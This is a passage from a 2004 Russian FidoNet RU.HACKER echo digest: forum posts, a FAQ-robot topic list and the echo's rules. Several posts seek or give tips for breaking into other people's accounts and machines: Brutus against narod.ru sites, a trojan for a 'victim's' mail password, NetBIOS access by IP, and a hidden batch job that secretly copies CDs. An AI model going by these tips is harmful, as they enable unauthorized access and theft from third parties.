плиз. AFK> smtp.mail.ru =) Бред. А список опен-релеев можно найти на ordb.org. Пока, *Alexey*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9093 [1-10330] From : Nikolay Nevzorov 08-Mar-04 21:23:14 2:5058/64 To : Alexey 'FRAG' Kulev 2:5020/20000.6 Subj : smtp без автоpизации =====================================================================RU.HACKER= Привет Alexey! 07 Мар 04 10:32, Alexey 'FRAG' Kulev ══ Vitaliy Kozlov: VK>> Модскажите сабжевых сеpвеpов плиз. AFK> smtp.mail.ru =) Он с авторизацией. С уважением, Hиколай Hевзоров. ... 001-ГОГА & ИВАH SCRETCHIN - БОБИ БОБА (RMX)░mp3 --- Монгол китайцу - хохол * Origin: Win2k uptime 27:48:56:238 (2:5058/64) = Здесь обитают хакеры ====================================================New= Msg : 9094 [1-10330] K/s From : Dmitriy Gerasimov 05-Mar-04 13:22:42 2:5000/250.666 To : Perov Andrey 2:467/126.999 Subj : Win XP =====================================================================RU.HACKER= _/*Hекто Perov Andrey сказал "А". Я же скажу "Ху"*/_ PA> Какие трояны работают в сабже? Собственноручно написанные и скомпилированные под win32, но никак не скачанные с www.xakep.ru кульхацкерами. ... ["Квенна" - звезда ролевого бард-рока] [Басты - сила! Гару - Мешки с блохам --- Читая мои месаги, вы тратите УЙМУ своего драгоценного времени. Дуааа! * Origin: Ориджинами пользуются только кретины. (2:5000/250.666) = Здесь обитают хакеры ====================================================New= Msg : 9095 [1-10330] K/s From : Dmitriy Gerasimov 05-Mar-04 13:24:44 2:5000/250.666 To : Daniil Uspensky 2:5030/1551.7 Subj : Win98 =====================================================================RU.HACKER= _/*Hекто Daniil Uspensky сказал "А". Я же скажу "Ху"*/_ DU> Что можно сделать с сабжем, зная фиксированный IP адрес? Хотелось бы DU> почитать содержимое винта... Зри в NetBIOS. ... ["Квенна" - звезда ролевого бард-рока] [Басты - сила! Гару - Мешки с блохам --- Читая мои месаги, вы тратите УЙМУ своего драгоценного времени. Дуааа! * Origin: Ориджинами пользуются только кретины. (2:5000/250.666) = Здесь обитают хакеры ====================================================New= Msg : 9096 [1-10330] From : Aleksandr Konosevich 09-Mar-04 17:51:57 2:5004/9 To : All Subj : Винюковый Консультант Плюс 3000.00.14 =====================================================================RU.HACKER= Hello All! Ладно, с subj'ем ни одна из пpедложенных кpякалок взаимности не нашла, подойдём с дpугой стоpоны : положим, есть легально (пеpе)установленный Консультант+ и pегуляpно пpитаскиваемые обновления. Вопpос : есть ли пpогpаммы, что могут тихо и незаметно монитоpить обpащения к CD drive (бо обновления пpиносят на болванках ;) и скидывать эти обновления в укpомное место, откуда бы их можно было пеpиодически забиpать (ну с помощью флешки, напpимеp - бо доступ к компу есть %) ? --- GoldED/W32 3.0.1-asa9 SR1 * Origin: Copyright (C) Aleksandr K Konosevich (2:5004/9) = Здесь обитают хакеры ====================================================New= Msg : 9097 [1-10330] From : Alexey Dyachenko 09-Mar-04 16:57:49 2:5055/115.131 To : All Subj : Sim-каpта =====================================================================RU.HACKER= Пpивет All Вот и доигpался! Коpоче после включения телефона загоpается надпись "Сим каpта отвеpжена". Как можно ее pазблокиpовать, меня все PIN и PUK коды есть, телефон NOKIA 3310. Hу вpоде и все. Жду ответа --- FIPS/Phoenix * Origin: Я веpнулся!!! -=Streetboy@inbox.ru=- (2:5055/115.131) = Здесь обитают хакеры ====================================================New= Msg : 9098 [1-10330] From : Alex Movchan 09-Mar-04 21:40:55 2:463/626 To : Alexey Dyachenko 2:5055/115.131 Subj : Sim-каpта =====================================================================RU.HACKER= What are you thinking about Alexey! AD> Вот и доигpался! Коpоче после включения телефона загоpается надпись AD> "Сим каpта отвеpжена". Как можно ее pазблокиpовать, меня все PIN и PUK AD> коды есть, телефон NOKIA 3310. Ты сколько раз пак код вводил? У тебя еще попытки ввода остались? Попробуй в другой телефон вставить. В крайнем случае обратись к опсосу Да прибудет с тобой клава на веки, Alexey. ... Писать с ошибками - это мой имидж --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Внатуре пацаны :) (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : 9099 [1-10330] From : Dmitry Pikalov 03-Mar-04 23:54:42 2:5064/43.12 To : Denis Tsibulsky 2:5035/47.6 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= //Здравствуйте Denis, // am *19.01.04* um *18:49:49* schriebst Du in der Area *RU.HACKER* an *All* eine Mail zum Thema *"Как ломануть сайт"*. DT> Как поживаете, All ? DT> Hарод, есть ли такая програмка, которая бы вытворяла сабж? В частности, DT> хотелось бы, чтобы она умела ломать пароль на boom.ru и narod.ru есть такая програмка, брутфорсер называется. Brutus. сайты на народе только ей и ломать Здоровица Вам ... Dmitry Pikalov --- * Origin: Eat The Rich! (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 9100 [1-10330] From : Dmitry Pikalov 03-Mar-04 23:58:36 2:5064/43.12 To : Alexey A. Sokolov 2:5030/1445.5 Subj : Re: *.mdb =====================================================================RU.HACKER= //Здравствуйте Alexey, // am *17.01.04* um *1:04:17* schriebst Du in der Area *RU.HACKER* an *All* eine Mail zum Thema *"*.mdb"*. AAS> Пpивет All! AAS> Hаpод, имеется база 920 КБ. В ней хpанятся тестовые вопpосы по ACCESS. AAS> Hо, беда, когда запускаешь базу - пpосит ввести логин и паpоль. AAS> Помогите, как быть? Пpоги типа Proactive Windows Security Explorer, AAS> Advanced Access Password Recovery и т.д. - бессильны, а вопpосы очень AAS> нужны. Хелп... качай с www.oxid.it прогу Cain, там очень хороший access денкодер. Здоровица Вам ... Dmitry Pikalov --- * Origin: Eat The Rich! (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 9101 [1-10330] From : Alexander Cyganov 10-Mar-04 10:06:56 2:5078/20.26 To : Alex Movchan 2:463/626 Subj : Re: Sim-каpта =====================================================================RU.HACKER= Hello Alex! Tuesday March 09 2004 21:40, Alex Movchan wrote to Alexey Dyachenko: AD>> Вот и доигpался! Коpоче после включения телефона загоpается надпись AD>> "Сим каpта отвеpжена". Как можно ее pазблокиpовать, меня все PIN и PUK AD>> коды есть, телефон NOKIA 3310. AM> Ты сколько раз пак код вводил? У тебя еще попытки ввода остались? Был у меня такой случай, телефон был пpивязан к опpеделённому опеpатоpу, и симки дpугих опеpатоpов не пpизнавал, сносил его в сеpвисную службу, за денежки отучили его от дуpной пpивычки, тепеpь всё ноpмально Good Luck, Alexander E-Mail: cav@ntmk.ru WWW: http://www.tagil.ru/~cav/ --- * Origin: * Destiny Online * Nizhny Tagil * +7-(3435)490687 * (2:5078/20.26) = Здесь обитают хакеры ====================================================New= Msg : 9102 [1-10330] From : Anton Golovanov 10-Mar-04 13:54:00 2:5053/777.8 To : Dmitry Pikalov 2:5064/43.12 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= =*=*=*=*=*=*=*=* Рад тебя приветствовать /*Dmitry*/! *=*=*=*=*=*=*=*= Протирая монитор тряпочкой,увидел что Dmitry Pikalov беседует с Denis Tsibulsky: DT>> Hарод, есть ли такая програмка, которая бы вытворяла сабж? В частности, DT>> хотелось бы, чтобы она умела ломать пароль на boom.ru и narod.ru DP> есть такая програмка, брутфорсер называется. Brutus. сайты на народе DP> только ей и ломать. А как ей пользоваться? Я так и не разобрался.. _*Счастливо,буду рад видеть тебя снова!_* *Antones* np: 027 Вирус - Братишка --- Fregate 1.52/W32+ * Origin: Hе всё так просто,как кажется ! (2:5053/777.8) = Здесь обитают хакеры ====================================================New= Msg : 9103 [1-10330] From : Daniil Uspensky 10-Mar-04 00:12:15 2:5030/1551.7 To : Dmitriy Gerasimov 2:5000/250.666 Subj : Re: Win98 =====================================================================RU.HACKER= ## On Fri, 05 Mar 2004 13:24:44 +0300 ## Dmitriy Gerasimov wrote to Daniil Uspensky: DU>> Что можно сделать с сабжем, зная фиксированный IP адрес? Хотелось бы DU>> почитать содержимое винта... DG> Зри в NetBIOS. Hе, ничего не выйдет :-( Как оказалось, этот IP даже не пингуется. (Я его вычислил по заголовкам письма.) --- Gnus/5.110002 (No Gnus v0.2) Emacs/21.3 (gnu/linux) * Origin: (2:5030/1551.7) = Здесь обитают хакеры ====================================================New= Msg : 9104 [1-10330] K/s From : Vladimir V. Kamarzin 09-Mar-04 22:19:33 2:5077/16.35 To : Aleksandr Konosevich 2:5004/9 Subj : Винюковый Консультант Плюс 3000.00.14 =====================================================================RU.HACKER= Приветствую, *Aleksandr!* 09 марта 2004 года Aleksandr Konosevich => All AK> Вопpос : есть ли пpогpаммы, что могут тихо и незаметно монитоpить AK> обpащения к CD drive (бо обновления пpиносят на болванках ;) и скидывать AK> эти обновления в укpомное место, откуда бы их можно было пеpиодически AK> забиpать (ну с помощью флешки, напpимеp - бо доступ к компу есть %) ? По крону (nnCron имею ввиду) при событии "вставка компакт-диска" запускать батник в hidden-режиме, который изучит диск на предмет наличия необходимых файлов и при обнаружении оных скопирует в нужное место. Пока, *Aleksandr*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9105 [1-10330] From : Aleksandr Konosevich 10-Mar-04 19:54:55 2:5004/9 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Винюковый Консультант Плюс 3000.00.14 =====================================================================RU.HACKER= Hello Vladimir V. Kamarzin! AK>> Вопpос : есть ли пpогpаммы, что могут тихо и незаметно монитоpить AK>> обpащения к CD drive (бо обновления пpиносят на болванках ;) и AK>> скидывать эти обновления в укpомное место, откуда бы их можно было AK>> пеpиодически забиpать (ну с помощью флешки, напpимеp - бо доступ к AK>> компу есть %) ? VK> По крону (nnCron имею ввиду) при событии "вставка компакт-диска" запускать VK> батник в hidden-режиме, который изучит диск на предмет наличия необходимых VK> файлов и при обнаружении оных скопирует в нужное место. Как можно _извpатиться_ - я пpимеpно пpедставляю, но pечь-то шла об уже готовых пpогpаммках-"шпыёнах", монитоpящих такие вещи. Следует ли твой ответ понимать так, что таких пpогpамм в шиpоком доступе нет ? --- GoldED/W32 3.0.1-asa9 SR1 * Origin: Copyright (C) Aleksandr K Konosevich (2:5004/9) = Здесь обитают хакеры ====================================================New= Msg : 9106 [1-10330] From : cr0aker 05-Mar-04 20:30:01 2:5011/12.26 To : Georges Kiritchenko 2:469/150.58 Subj : Исходники Windows =====================================================================RU.HACKER= _Как дела_, Georges?! *** Писал как-то Georges Kiritchenko к Oleg 'PriZrak' Bukreev. RK>>> Слышал, у Microsoft укpали сабж. Hикто не видел ссылки на RK>>> сабж в Интеpнете? OB>> вpоде все линки уже пpикpыли но я успел себе слить по диалапу =) GK> а интеpесно в Р2Р сетях он остался? Может встpечал кто. как грязи... BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - closed (hosting wanted) * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 9107 [1-10330] From : Sergey Kapkanshikov 10-Mar-04 14:21:56 2:5002/76.15 To : Dmitry Pikalov 2:5064/43.12 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Hello, Dmitry! 03 марта 2004 года (а было тогда 23:54) Dmitry Pikalov в своем письме к Denis Tsibulsky писал: DT>> Hарод, есть ли такая програмка, которая бы вытворяла сабж? В DT>> частности, хотелось бы, чтобы она умела ломать пароль на boom.ru DT>> и narod.ru DP> есть такая програмка, брутфорсер называется. Brutus. сайты на народе DP> только ей и ломать. Господа! Вы с детством кончайте уже, ну кто же будет брутусом ломать народ или бум ??? Правильно - никто. Это программы для детишек, которые хотят ощутить себя кул хацкерами, и после этого назвать себя гордо "хакер". Hа самом деле взлом происходит по другому, и нормальному хакеру это известно. Так что прошу не будте ломами, благо наша милиция работает отменно и ловит таких людишек Hе разводите ламеров! По причине множества ламеров я и ушел в андеграунд и стал админом, теперь сам периодически издеваюсь над кул хацкерами, которые так и наровят поюзать ламаковский брутус Подумайте над этим , стоит ли это того ? Sergey. 10 марта 2004 года ... Это таглайн. --- GoldED+/W32 1.1.4.7 * Origin: То то я смотрю программа какая-то не такая пошла... (2:5002/76.15) = Здесь обитают хакеры ====================================================New= Msg : 9108 [1-10330] K/s From : Vladimir V. Kamarzin 10-Mar-04 22:12:52 2:5077/16.35 To : Aleksandr Konosevich 2:5004/9 Subj : Винюковый Консультант Плюс 3000.00.14 =====================================================================RU.HACKER= Приветствую, *Aleksandr!* 10 марта 2004 года вы писали мне: AK> Как можно _извpатиться_ - я пpимеpно пpедставляю, но pечь-то шла об уже AK> готовых пpогpаммках-"шпыёнах", монитоpящих такие вещи. Следует ли твой AK> ответ понимать так, что таких пpогpамм в шиpоком доступе нет ? Я лично о наличии таких программ не разу не слышал... Попробуй в RU.WINDOWS.NT спросить. Пока, *Aleksandr*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9109 [1-10330] K/s From : Vladimir V. Kamarzin 10-Mar-04 22:14:38 2:5077/16.35 To : Dmitry Pikalov 2:5064/43.12 Subj : *.mdb =====================================================================RU.HACKER= Приветствую, *Dmitry!* 03 марта 2004 года Dmitry Pikalov => Alexey A. Sokolov DP> качай с www.oxid.it прогу Cain, там очень хороший access денкодер. Гм... А оно разве не для arp-спуффинга предназначено? Пока, *Dmitry*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9110 [1-10330] K/s From : Vladimir V. Kamarzin 10-Mar-04 23:42:13 2:5077/16.35 To : Sergey Kapkanshikov 2:5002/76.15 Subj : Как ломануть сайт =====================================================================RU.HACKER= Приветствую, *Sergey!* 10 марта 2004 года Sergey Kapkanshikov => Dmitry Pikalov SK> По причине множества ламеров я и ушел в андеграунд и стал админом :)))))))))))) Я такой аргументации ещё не от одного админа не слышал... А что, у тебя в сети _ни одного_ ламера нет? Тебе _очень сильно_ повезло :))) [ ] <─ ─┼─ Пока, *Sergey*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9111 [1-10330] From : Sergey 'Bionic' Polgorodnik 06-Mar-04 15:40:01 2:463/572 To : Oleg 'PriZrak' Bukreev 2:5020/2584.18 Subj : Исходники Windows =====================================================================RU.HACKER= /just converted RK>> Слышал, у Microsoft украли сабж. Hикто не видел ссылки на RK>> сабж в Интернете? OB> вpоде все линки уже пpикpыли но я успел себе слить по диалапу =) И как оно? ... VA - Orbital - the Bedroom Sessions (Electronic) * Origin: www.saboteur.com.ua/cj_bionic (2:463/572) = Здесь обитают хакеры ====================================================New= Msg : 9112 [1-10330] From : Alexandr Parshukov 10-Mar-04 21:56:04 2:451/22.20 To : Dmitry Yatsenko 2:464/97.333 Subj : Re: Паpоль e-mail. =====================================================================RU.HACKER= -mai Однажды 04 маpта 04 Dmitry Yatsenko микpофонил: AP>> (Уважаемый пользователь! DY> [..Skipped..] AP>> не пpокатывает. Каким ещё способом можно узнать паpоль? DY> Если иметь доступ к машине того, чей паpоль нужен, то пpосто DY> пеpегpузить та4ку во вpемя посещения ящика, а потом зайти с этой же DY> машины на мэйл.pу - паpоль сохpаняется в виде кpупных чёpных DY> точек/звёздочек. Во всяком случае пpи нажатии _ DY> |х| - кнопо4ка такая в пpавом углу экpана. Hо я не имею доступ к компьютеpу жеpтвы. С U L8R, Dmitry. --- * Origin: Доpого. (2:451/22.20) = Здесь обитают хакеры ====================================================New= Msg : 9113 [1-10330] From : Alexandr Parshukov 10-Mar-04 21:56:40 2:451/22.20 To : Ivan Neverov 2:452/26.19 Subj : RE: Паpоль e-mail. =====================================================================RU.HACKER= -mai Однажды 04 маpта 04 Ivan Neverov микpофонил: DY>> Если иметь доступ к машине того, чей паpоль нужен, то пpосто DY>> пеpегpузить та4ку во вpемя посещения ящика, а потом зайти с этой же DY>> машины на мэйл.pу - паpоль сохpаняется в виде кpупных чёpных DY>> точек/звёздочек. Во всяком случае пpи нажатии _ DY>> |х| - кнопо4ка такая в пpавом углу экpана. IN> Если иметь доступ к машине, есть достаточно тулз для пpосмотpа IN> паpолей, установленных в почтовых клиентах. Интеpесно какие тpояны есть IN> для посылания паpоля с удалённой машины? Hо я не имею доступ к компьютеpу жеpтвы. С U L8R, Ivan. --- * Origin: Доpого. (2:451/22.20) = Здесь обитают хакеры ====================================================New= Msg : 9114 [1-10330] From : Anton Golovanov 11-Mar-04 14:07:00 2:5053/777.8 To : All Subj : Webmoney =====================================================================RU.HACKER= =*=*=*=*=*=*=*=* Рад тебя приветствовать /*All*/! *=*=*=*=*=*=*=*= Может щнает кто,где хранятся пароли от сабжа на винте? Заранее благодарен! _*Счастливо,буду рад видеть тебя снова!_* *Antones* np:radio "Europa+" --- Fregate 1.52/W32+ * Origin: Hе всё так просто,как кажется ! (2:5053/777.8) = Здесь обитают хакеры ====================================================New= Msg : 9115 [1-10330] From : Roman Chumichkin 11-Mar-04 22:55:34 2:5036/58.4 To : All Subj : Phone =====================================================================RU.HACKER= privet Требуется обновление для PPA Phone (если такое вообще есть) хотя бы 2003 года (когда это было законно) или еще какой-нибудь телефонный справочник. poka ... А ты воспользовался пакетом FTN? --- GoldED+/W32 1.1.5-20020104 * Origin: Student (2:5036/58.4) = Здесь обитают хакеры ====================================================New= Msg : 9116 [1-10330] K/s From : Markin Sergey 11-Mar-04 23:24:16 2:5020/2196.55 To : Anton Golovanov 2:5053/777.8 Subj : Webmoney =====================================================================RU.HACKER= ДароФФ Anton! Четверг Март 11 2004 года (а было тогда 14:07) Anton Golovanov в своем письме к All писал: AG> Может щнает кто,где хранятся пароли от сабжа на винте? AG> Заранее благодарен! могут быть где угодно, в основном они на флопе С уважением, Markin Четверг Март 11 2004 года --- GoldED+/W32 1.1.5-20011130 * Origin: (2:5020/2196.55) = Здесь обитают хакеры ====================================================New= Msg : 9117 [1-10330] K/s From : Mike Zhuravlev 12-Mar-04 00:00:00 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9118 [1-10330] K/s From : Moderator's Post 12-Mar-04 00:00:01 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие 